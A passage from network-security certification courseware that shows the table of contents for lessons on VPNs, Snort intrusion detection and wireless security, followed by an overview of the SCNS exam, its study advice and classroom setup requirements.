Task 6D-4 Implementing the 7_REQUIRE_AH(sha)+ESP(sha+3des) Policy . 333
Configuring the AH-and-ESP IPSec Response Policy. . . . . . . . . . . . . . . 335
Task 6D-5 Implementing the 7_RESPOND_AH(sha)+ESP(sha+3des) Policy . 335
Implementing the Full IPSec Session . . . . . . . . . . . . . . . . . . . . . . . . . . 336
Task 6D-6 Implementing and Analyzing an AH(sha) and ESP(sha+3des) IPSec Session . . . . . . . 336
Topic 6E VPN Fundamentals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .337
VPN Business Drivers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
VPN Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 339
CONTENTS
x Tactical Perimeter Defense
VPN Elements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
Tunneling and Security Protocols . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341
Task 6E-1 Defining Tunneling Protocols . . . . . . . . . . . . . . . . . . . . . . . 341
Topic 6F Tunneling Protocols . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .341
Point-to-Point Tunneling Protocol (PPTP) . . . . . . . . . . . . . . . . . . . . . . 342
Layer 2 Tunneling Protocol (L2TP) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
IPSec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344
IPSec Tunnel and Transport Modes . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
IPSec and Network Address Translation (NAT) . . . . . . . . . . . . . . . . . . . 346
Task 6F-1 Assigning Tunneling Protocols . . . . . . . . . . . . . . . . . . . . . . 347
Topic 6G VPN Design and Architecture. . . . . . . . . . . . . . . . . . . . . . . . . .348
VPN Implementation Challenges. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
Task 6G-1 Examining VPN-related RFCs. . . . . . . . . . . . . . . . . . . . . . . . 349
Topic 6H VPN Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .350
VPNs and Firewalls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 351
VPN Authentication. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 352
Task 6H-1 Viewing Firewall-related RFCs . . . . . . . . . . . . . . . . . . . . . . . 353
Topic 6I Configuring a VPN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .354
Task 6I-1 Configuring the VPN Server . . . . . . . . . . . . . . . . . . . . . . . . 354
VPN Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
Task 6I-2 Configuring VPN Clients. . . . . . . . . . . . . . . . . . . . . . . . . . . 359
Establishing the VPN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361
Task 6I-3 Establish the VPN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362
Returning the Classroom Setup to its Original State . . . . . . . . . . . . . . 364
Task 6I-4 Restoring the Classroom Setup . . . . . . . . . . . . . . . . . . . . . . 364
Lesson Review 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
LESSON 7: DESIGNING AN INTRUSION DETECTION SYSTEM
Topic 7A The Goals of an Intrusion Detection System . . . . . . . . . . . . .371
What is Intrusion Detection? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
Some Intrusion Detection Definitions . . . . . . . . . . . . . . . . . . . . . . . . . 373
The IDS Matrix. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 373
IDS Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
Realistic Goals of IDS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 376
Task 7A-1 Describing Alarms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377
Topic 7B Technologies and Techniques of Intrusion Detection. . . . . .377
The Intrusion Detection Process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
Behavioral Use. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 379
Information Collection and Analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . 382
Task 7B-1 Discussing IDS Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . 383
Topic 7C Host-based Intrusion Detection . . . . . . . . . . . . . . . . . . . . . . .384
Host-based IDS Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 384
Centralized Host-based IDS Design. . . . . . . . . . . . . . . . . . . . . . . . . . . . 384
Distributed Host-based IDS Design. . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
Task 7C-1 Describing Centralized Host-based Intrusion Detection . . . . . . 387
Topic 7D Network-based Intrusion Detection . . . . . . . . . . . . . . . . . . . .387
Network-based IDS Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 388
Traditional Network-based IDS Design . . . . . . . . . . . . . . . . . . . . . . . . . 388
Distributed Network-based IDS Design. . . . . . . . . . . . . . . . . . . . . . . . . 389
Task 7D-1 Discussing Sensor Placement . . . . . . . . . . . . . . . . . . . . . . . 390
Topic 7E The Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .391
When to Analyze . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Interval Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Real-time Analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
How to Analyze . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 392
Signature Analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 392
An Example Signature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 392
Statistical Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393
Task 7E-1 Discussing Data Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . 394
Topic 7F How to Use an IDS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .394
Detection of Outside Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 394
Detection of Inside Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Anticipation of Attack Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397
Surveillance Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397
Task 7F-1 Discussing Intrusion Detection Uses . . . . . . . . . . . . . . . . . . 397
Topic 7G What an IDS Cannot Do . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .398
Provide the Magic Solution. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
Manage Hardware Failures. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
Investigate an Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
100 Percent Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
Task 7G-1 Discussing Incident Investigation . . . . . . . . . . . . . . . . . . . . 399
Lesson Review 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
LESSON 8: CONFIGURING AN IDS
Topic 8A Snort Foundations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .404
Snort Deployment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
How Snort Works . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
Snort Fundamentals. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Topic 8B Snort Installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .406
Task 8B-1 Installing Snort . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
Common Snort Commands. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
Task 8B-2 Initial Snort Configuration . . . . . . . . . . . . . . . . . . . . . . . . 408
Using Snort as a Packet Sniffer. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
Task 8B-3 Capturing Packets with Snort . . . . . . . . . . . . . . . . . . . . . . . 411
Task 8B-4 Capturing Packet Data with Snort . . . . . . . . . . . . . . . . . . . . 413
Task 8B-5 Logging with Snort. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
Topic 8C Snort as an IDS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .415
It's All in the Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
Snort Rule IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 420
Task 8C-1 Creating a Simple Ruleset . . . . . . . . . . . . . . . . . . . . . . . . . 421
Task 8C-2 Testing the Ruleset. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421
More Rule Options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 422
Pre-configured Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 425
Task 8C-3 Examining Pre-configured Rules . . . . . . . . . . . . . . . . . . . . . 426
Examine Denial of Service Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 426
Task 8C-4 Examining DDoS Rules. . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
Examine Backdoor Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
Task 8C-5 Examining Backdoor Rules . . . . . . . . . . . . . . . . . . . . . . . . . 427
Examine Web Attack Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 428
Task 8C-6 Examining Web Attack Rules . . . . . . . . . . . . . . . . . . . . . . . 428
Examine Web IIS Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429
Task 8C-7 Examining IIS Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429
Topic 8D Configuring Snort to Use a Database . . . . . . . . . . . . . . . . . . .430
Snort Output Plug-ins . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Configure Snort to Use a Database . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Task 8D-1 Editing Snort.Conf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
Installing MySQL for Snort . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
Task 8D-2 Installing MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
Task 8D-3 Creating the Snort Database. . . . . . . . . . . . . . . . . . . . . . . . 432
MySQL User Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433
Task 8D-4 Creating MySQL User Accounts . . . . . . . . . . . . . . . . . . . . . . 433
Snort to Database Connectivity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433
Task 8D-5 Testing the New Configuration . . . . . . . . . . . . . . . . . . . . . . 434
Snort as a Service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
Task 8D-6 Configuring Snort as a Service . . . . . . . . . . . . . . . . . . . . . . 434
Topic 8E Running an IDS on Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . .435
LAMP On SuSe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435
Task 8E-1 Installing LAMP Components . . . . . . . . . . . . . . . . . . . . . . . 436
Apache and PHP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436
Task 8E-2 Apache and PHP Test . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
Enable Snort on Linux. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438
Task 8E-3 Configure Snort on Linux. . . . . . . . . . . . . . . . . . . . . . . . . . 438
Configuring MySQL on Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438
Task 8E-4 Configuring MySQL for Snort. . . . . . . . . . . . . . . . . . . . . . . . 439
Connecting Snort to a Database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
Task 8E-5 Testing Snort Connectivity to the Database. . . . . . . . . . . . . . 440
Installing ADOdb and BASE. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
Task 8E-6 Downloading ADOdb and BASE . . . . . . . . . . . . . . . . . . . . . . 441
Task 8E-7 Installing ADOdb and BASE . . . . . . . . . . . . . . . . . . . . . . . . 441
Configuring BASE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 442
Task 8E-8 Configuring BASE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 442
Task 8E-9 Configuring the Firewall to Allow HTTP . . . . . . . . . . . . . . . . 443
Generating Snort Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
Task 8E-10 Generating Portscan Snort Events . . . . . . . . . . . . . . . . . . . . 443
Task 8E-11 Generating Web Snort Events . . . . . . . . . . . . . . . . . . . . . . . 444
Lesson Review 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
LESSON 9: SECURING WIRELESS NETWORKS
Topic 9A Wireless Networking Fundamentals . . . . . . . . . . . . . . . . . . . .448
Wireless Equipment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448
Wireless Media. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451
Task 9A-1 Examining Satellite Orbits . . . . . . . . . . . . . . . . . . . . . . . . . 456
Radio Wireless Media. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 457
Bluetooth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
Short Message Service. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
IEEE 802.11. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460
Wireless Application Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 462
Task 9A-2 Choosing a Wireless Media . . . . . . . . . . . . . . . . . . . . . . . . . 464
Topic 9B Wireless LAN (WLAN) Fundamentals . . . . . . . . . . . . . . . . . . .465
Association . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
WLAN Topologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
Lesson Configuration. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468
Prepare for the Ad-hoc Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468
Task 9B-1 Installing the Linksys WPC54G WNIC . . . . . . . . . . . . . . . . . . 469
Configure the Second WNIC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
Task 9B-2 Installing the Netgear WPN511. . . . . . . . . . . . . . . . . . . . . . 471
Enable the Ad-Hoc Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474
Task 9B-3 Enabling the Ad-Hoc Network. . . . . . . . . . . . . . . . . . . . . . . 474
802.11 Framing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 476
Access Point Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 482
Task 9B-4 Installing the Linksys WAP54G Access Point . . . . . . . . . . . . . 482
Configure the Infrastructure Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . 485
Task 9B-5 Configuring the Linksys Client . . . . . . . . . . . . . . . . . . . . . . 485
Adding Infrastructure Network Clients . . . . . . . . . . . . . . . . . . . . . . . . . 487
Task 9B-6 Configuring the Netgear Client . . . . . . . . . . . . . . . . . . . . . . 487
WLAN Threats. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 488
Topic 9C Wireless Security Solutions . . . . . . . . . . . . . . . . . . . . . . . . . . .490
Wireless Transport Layer Security (WTLS) . . . . . . . . . . . . . . . . . . . . . . . 491
Fundamental Access Point Security . . . . . . . . . . . . . . . . . . . . . . . . . . . 493
Wired Equivalent Privacy (WEP) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
Configure WEP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501
Task 9C-1 Installing the Netgear WPN824 Access Point . . . . . . . . . . . . . 502
Establishing the WEP Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 504
Task 9C-2 Configuring WEP on the Network Client . . . . . . . . . . . . . . . . 505
Temporal Key Integrity Protocol (TKIP) . . . . . . . . . . . . . . . . . . . . . . . . 506
Extensible Authentication Protocol (EAP) . . . . . . . . . . . . . . . . . . . . . . 506
Wi-Fi Protected Access (WPA). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 507
Configure WPA2. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 509
Task 9C-3 Configure WPA2 on the Access Point . . . . . . . . . . . . . . . . . . 509
Supplicants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 509
Task 9C-4 Configuring WPA2 on the Network Client . . . . . . . . . . . . . . . 510
802.1x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 512
Topic 9D Wireless Auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .512
Wireshark. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513
NetStumbler. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513
Task 9D-1 Installing NetStumbler . . . . . . . . . . . . . . . . . . . . . . . . . . . 514
Identify Wireless Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 514
Task 9D-2 Identifying Wireless Networks . . . . . . . . . . . . . . . . . . . . . . 515
OmniPeek Personal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 515
Task 9D-3 Installing OmniPeek Personal . . . . . . . . . . . . . . . . . . . . . . . 516
WildPackets Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 517
OmniPeek Personal Captures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 517
Task 9D-4 Viewing OmniPeek Personal Captures . . . . . . . . . . . . . . . . . . 517
Live Captures. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 521
Task 9D-5 Viewing Live OmniPeek Personal Captures. . . . . . . . . . . . . . . 521
Non-802.11 Packets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 522
Task 9D-6 Analyze Upper Layer Traffic . . . . . . . . . . . . . . . . . . . . . . . . 522
Decode WEP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 523
Task 9D-7 Decrypting WEP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 523
Aircrack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 526
WEPCrack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 527
AirSnort . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 527
Ekahau. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 527
Kismet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 527
Topic 9E Wireless Trusted Networks. . . . . . . . . . . . . . . . . . . . . . . . . . . .528
802.1x and EAP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 528
EAP Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 529
Lightweight EAP (LEAP) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 529
EAP with Transport Layer Security (EAP-TLS) . . . . . . . . . . . . . . . . . . . . 530
EAP with Tunneled Transport Layer Security (EAP-TTLS) . . . . . . . . . . . 531
Protected EAP (PEAP) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 531
EAP Type Comparison . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
Wireless Trusted Network Summary. . . . . . . . . . . . . . . . . . . . . . . . . . . . 533
Task 9E-1 Choosing a Wireless Trusted Network . . . . . . . . . . . . . . . . . . 533
Lesson Review 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 534
Glossary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .537
Index. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .543
ABOUT THIS COURSE
This course is the official courseware for the Security Certified Program SC0-451
certification exam. The Tactical Perimeter Defense course is designed to provide
network administrators and certification candidates with hands-on tasks on the
most fundamental perimeter security technologies. The network perimeter is often
the first line of defense in an organization's network, and this course covers the
issues every administrator must be familiar with.
What is the Security Certified Program (SCP)?
Security Certified Program is both our company name and our program name.
Security Certified Program, LLC, a Chicago-based security training organization,
has created the Security Certified Program (SCP) to help develop and validate
your skills as a computer and network security professional. The SCP courses and
certifications are designed not just around knowledge-based theory, like so many
others, but around the actual technical skills required by practitioners.
The SCP structure is unique in that it measures competence in core security skills as
well as skills needed for specific security technologies, such as Packet Structure,
Signature Analysis, Operating System Hardening, Router Security, Firewalls, Virtual
Private Networks (VPNs), Intrusion Detection, Risk Analysis, Wireless Security,
Digital Signatures and Certificates, Cryptography, Biometrics and Network Forensics.
The SCP certifications include three vendor-neutral security certifications. The
first certification is the Security Certified Network Specialist (SCNS), the next
certification is Security Certified Network Professional (SCNP), and the third is
Security Certified Network Architect (SCNA).
About This Course xvii
The Security Certified Program Certification Path
What is SCNS?
The SCNS (Security Certified Network Specialist) is the SCP's core certification.
The primary focus is on the defense of the perimeter. This certification covers the
core security technologies used in defending today's business environments,
including the following: Network Defense Fundamentals, Advanced TCP/IP,
Router Security and Access Control Lists, Designing & Configuring Firewalls,
Configuring Virtual Private Networks, Designing & Configuring Intrusion Detection
Systems, and Securing Wireless Networks.
What kind of experience do I need before I go for my SCNS?
Before you begin the SCNS certification track, it is recommended that, at a minimum,
you attain CompTIA's Security+ certification or have equivalent training
with hands-on experience. The SCNS training and certification build on concepts
and skills covered in the Security+ certification.
How do I become SCNS certified?
The SCNS certification is comprised of one exam, titled Tactical Perimeter
Defense (TPD). To become SCNS certified, candidates must complete this exam
with a passing score. The TPD exam uses exam number SC0-451.
It is strongly recommended that candidates study this official courseware extensively,
and implement the hands-on tasks repeatedly, before taking the exams.
What are exams like?
The exams are multiple-answer, often scenario-based tests. The TPD exam has 60
questions and the candidate has 90 minutes to complete the exam.
At the time of this publication, the exam breakdown was as follows:
Examination Domain Percentage
1.0 Network Defense Fundamentals 5%
2.0 Hardening Routers and Access Control Lists 10%
3.0 Implementing IPSec and Virtual Private Networks 10%
4.0 Advanced TCP/IP 15%
5.0 Securing Wireless Networks 15%
6.0 Designing and Configuring Intrusion Detection Systems 20%
7.0 Designing and Configuring Firewall Systems 25%
Note that SCP exams are updated regularly to reflect changes in the network
security industry. It is strongly recommended that potential candidates review the
exam objectives at www.securitycertified.net/certifications.htm
How do I take the exams?
The SCP exams are available at any Prometric or VUE Testing center in over
7,400 locations around the world.
There are several ways to register for SCP exams. To register for SCP exams
over the Internet, visit Prometric at www.prometric.com/SCP or VUE at www.
vue.com/scp/ and create an account with the vendor of your choice (if you don't
already have one).
For International Exam Registration, please check with your preferred vendor's
Web site for more information.
During the exam:
Read questions carefully. Don't jump to any conclusions!
Skip questions that you are unsure of, and come back to them at the end.
If you have time remaining, you will be given the opportunity to review your answers. Be sure to do so, and make sure you didn't make any obvious mistakes.
If you come back to a question and are not sure about an answer, remember that your first hunch is more often correct than your second-choice answer (after overanalyzing the question)!
Be sure to answer all questions; unanswered questions count against your score, so if you don't have an answer, try to eliminate any options that you know are wrong and make a best guess from whatever remains.
On your exam day, try to arrive 15 minutes early so you do not feel rushed or
stressed by being late. This will also give you a few minutes to review any notes
before beginning your exam. However, as the SCP exams are closed-book, notes
or calculators may not be brought into the testing station and will have to be left
with the facility's staff.
Will my certificate expire?
Yes. As technologies in the security field are constantly changing, your SCNS
certificate will be valid for two years starting on the date you pass the Tactical
Perimeter Defense exam. Candidates who have received their SCNS credential
will need to retake the TPD exam before their SCNS certification expires. Candidates
who are recertifying will be able to do so at a discounted exam rate. For
more information on the current SCNS re-certification exam rate please email
Exams@SecurityCertified.Net.
What if I want to go further?
After you have become SCNS-certified you will have the option of furthering
your skills by moving on to the next level of SCP certification, the Security Certified
Network Professional (SCNP) certificate.
The Security Certified Network Professional (SCNP) certification is focused on
infrastructure technologies. SCNP builds upon the security concepts and technologies
covered in Tactical Perimeter Defense (TPD). The SCNP course, Strategic
Infrastructure Security (SIS), covers several critical areas: Cryptography, Operating
System Security (Windows 2003 and SuSe Linux), Attack Techniques,
Internet and WWW Security, Risk Analysis, Security Policy Creation, and Analysis
of Intrusion Signatures.
To become a Security Certified Network Professional (SCNP), candidates must
successfully pass one exam and hold a current Security Certified Network Specialist
(SCNS) certification.
Security Certified Program's third certification is Security Certified Network
Architect (SCNA). SCNA deals with more advanced security skills and concepts.
Many enterprises are trying to integrate Digital Signatures, Digital Certificates,
and Biometric and Smart Card Authentication systems into their infrastructures.
These technologies are vital for businesses as they look to integrate their partners
and suppliers into their business structures and provide real-time information and
services to their customers.
SCNA is about the fundamentals of building a trusted network, strong authentication
techniques, encryption, biometrics, smart cards, and network forensics.
SCNA includes two courses, Advanced Security Implementation (ASI) and Enterprise
Security Solutions (ESS). Each course is a 40-hour program, and the
content and hands-on labs are structured to develop the skills required by today's
top security experts.
To become a Security Certified Network Architect (SCNA), candidates must pass
two exams. The first is Enterprise Security Implementation (ESI), which covers
the concepts and lab work covered in both the ASI and ESS courses, and the second
is The Solutions Exam (TSE), which covers all facets of the technologies
covered in all of the SCP courses.
How do I prepare for the exam?
The TPD exam will require that you be familiar with many technologies and
utilities that are covered in this book. Further, the test was authored with the
intention that people who have not become familiar with the technologies and
utilities covered will not find it as easy to pass the exam as those who have used
the programs and technologies in question.
What does all this mean? It means that you really should use the utilities and
programs that are covered here, rather than just read about them. You should
become very familiar with all of the tasks in this book. If possible, create a home
lab with at least two machines, and practice, repeatedly, the hands-on tasks in
this book. Even using what you learned to help secure your own home network
from hosts on the Internet will help you prepare for the exam.
Studying for the exam:
1. Read the book from start to finish, completing all the tasks even if you are
familiar with the technology in question. You never know when some new
facet of a technology or program may be brought up, and many of the lessons
build upon the previous ones, so it is easy to miss something if you
skip around.
2. Be sure to complete all hands-on tasks. Again, the SCP exams are based on
knowledge and hands-on experience! Once you have completed a task, do it
again until you are very comfortable with that task.
3. Be sure to answer the Topic Review questions within each lesson. Make note of
the questions you answered incorrectly and study the appropriate sections
again.
4. Before taking the SCP exams, it is recommended that you take the practice
exams available through MeasureUp. More information on officially recommended
practice exams is available at: www.securitycertified.net/practice_tests.htm.
But perhaps the best way to make sure that you reach your goal is to register for
the exam and stick to the date you set forth. Nothing keeps you on your toes and
working toward a goal like a deadline! Honestly measure your skills, make your
study schedule, and set the date that you will be ready to take the exam and register
for it.
Practice exams
The only provider of practice exams authorized and recommended by the creators
of the SCP is MeasureUp. For more information visit www.securitycertified.net/
practice_tests.htm.
Contact Information
The Security Certified Program
US: 800-869-0025
International: 630-208-5030
Email: Info@SecurityCertified.Net
Website: www.SecurityCertified.Net
Course Prerequisites
To ensure your success, we recommend that you have CompTIA's Security+
certification, or equivalent experience. This course assumes that the reader has
fundamental working knowledge of networking concepts and foundational
security knowledge.
About This Course xxi
Course Objectives
When you're done working your way through this course, you'll be able to:
Describe the core issues of building a perimeter network defense system.
Investigate the advanced concepts of the TCP/IP protocol suite.
Secure routers through hardening techniques and configure Access Control Lists.
Design and configure multiple firewall technologies.
Examine and implement IPSec and Virtual Private Networks.
Design and configure an Intrusion Detection System.
Secure wireless networks through the use of encryption systems.
COURSE SETUP INFORMATION
Hardware and Software Requirements
To run this course, you will need:
Student machines, one per student, recommended minimum specifications:
Pentium 4, 2.0 GHz processor.
512 MB of RAM.
50 GB hard drive.
DVD-ROM drive.
NIC, capable of promiscuous mode support.
Integrated video card, capable of 32-bit video.
Instructor machine, same configuration as student machines.
Three Cisco routers, 2500 Series preferred (used from a reseller is fine), running
IOS 12.2 or greater, with IPSec/SSH support.
One Cisco console cable.
Two serial cables.
DCE to DTE, for connecting routers.
Three switches/hubs, 10/100 Mbps.
The firewall lesson will require Microsoft ISA Server 2006. This must be
downloaded as a 180-day trial from Microsoft, or full ISA Server software
must be provided for students.
During the VPN lesson, machines designated as VPN servers will require
two NICs. The NICs can be either integrated or non-integrated.
During the VPN lesson, the instructor machine will need to be running the
FTP Service. You may enable the service during your initial setup, or during
the VPN lesson, as you prefer.
For class preparation, you will need the following tools. Where the tools are
available under open source licensing, they have been included on the course
CD-ROM; all other tools should be downloaded and put in the correct folder.
All these tools should be copied to the C:\Tools or /Tools directories on your
Windows and Linux systems, respectively.
Lesson     Tool                                Download Source
Lesson 2   WinPcap_4_0.exe                     SCNS Book CD
           wireshark-setup-0.99.5.exe          SCNS Book CD
           tftp.cap                            SCNS Book CD
